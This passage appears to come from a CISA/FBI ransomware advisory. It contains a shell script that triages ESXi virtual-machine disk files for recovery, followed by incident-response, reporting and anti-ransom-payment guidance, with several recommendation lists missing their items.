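# "<name>: flat-missing" (no data file to rebuild from; the script cannot help).
triage_vm() {
    sectors=$(flat_sectors "$1" "$2") || { echo "$2: flat-missing"; return 0; }
    case $(descriptor_state "$1" "$2") in
        ok) echo "$2: intact" ;;
        *)  echo "$2: candidate $sectors" ;;
    esac
}

# Walk every "-flat.vmdk" one level below a datastore root such as
# /vmfs/volumes/datastore1 and triage the disk it belongs to.
scan_datastore() {
    for flat in "$1"/*/*-flat.vmdk; do
        [ -e "$flat" ] || continue
        name=${flat##*/}
        triage_vm "${flat%/*}" "${name%-flat.vmdk}"
    done
}

# Constructed sample datastore (1 MiB zero-filled flats) so the example runs
# offline: vm1 intact; vm2 descriptor overwritten; vm3 descriptor gone; vm4 descriptor overwritten and no flat.
make_sample_datastore() {
    ds=$(mktemp -d)
    mkdir -p "$ds/vm1" "$ds/vm2" "$ds/vm3" "$ds/vm4"
    for v in vm1 vm2 vm3; do
        dd if=/dev/zero of="$ds/$v/$v-flat.vmdk" bs=512 count=2048 2>/dev/null
    done
    printf '# Disk DescriptorFile\nversion=1\nCID=fffffffe\nparentCID=ffffffff\n' \
        > "$ds/vm1/vm1.vmdk"
    printf 'createType="vmfs"\n\nRW 2048 VMFS "vm1-flat.vmdk"\n' >> "$ds/vm1/vm1.vmdk"
    for v in vm2 vm4; do
        printf 'constructed junk standing in for an encrypted descriptor\n' > "$ds/$v/$v.vmdk"
    done
    echo "$ds"
}

# Stand-alone use: sh triage.sh /vmfs/volumes/datastore1
if [ -n "${1:-}" ]; then scan_datastore "$1"; fi
```

Run it with no argument and call `ds=$(make_sample_datastore); scan_datastore "$ds"` to see the three verdicts on the constructed datastore; a `candidate` line is the case the CISA script is designed for.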
The above script only serves as a method to recover essential services. Although CISA and FBI have not seen any evidence that the actors have established persistence, we recommend organizations take the following additional incident response actions after applying the script:
If you detect activity from the above, implement your incident response plan. CISA and FBI urge you to promptly report ransomware incidents to a local FBI Field Office, or to CISA at cisa.gov/report.
Organizations should also collect and review artifacts, such as running processes/services, unusual authentications, and recent network connections.
See the joint CSA from the cybersecurity authorities of Australia, Canada, New Zealand, the United Kingdom, and the United States on Technical Approaches to Uncovering and Remediating Malicious Activity for additional guidance on hunting or investigating a network, and for common mistakes in incident handling. CISA also encourages government network administrators to see CISA’s Federal Government Cybersecurity Incident and Vulnerability Response Playbooks. Although tailored to federal civilian branch agencies, these playbooks provide operational procedures for planning and conducting cybersecurity incident and vulnerability response activities and detail steps for both incident and vulnerability response.
Additional resources for recovering .vmdk files can be found on a third-party researcher’s website.[2]
Note: These mitigations align with the cross-sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. For more information on the CPGs, including additional recommended baseline protections, see cisa.gov/cpg.
CISA and FBI recommend all organizations:
In addition, CISA and FBI recommend organizations apply the following recommendations to prepare for, mitigate/prevent, and respond to ransomware incidents.
If a ransomware incident occurs at your organization:
Note: CISA and FBI strongly discourage paying ransoms as doing so does not guarantee files and records will be recovered. Furthermore, payment may also embolden adversaries to target additional organizations, encourage other criminal actors to engage in the distribution of ransomware, and/or fund illicit activities.
See Stopransomware.gov, a whole-of-government approach, for ransomware resources and alerts.
CISA and FBI would like to thank VMware for their contributions to this CSA.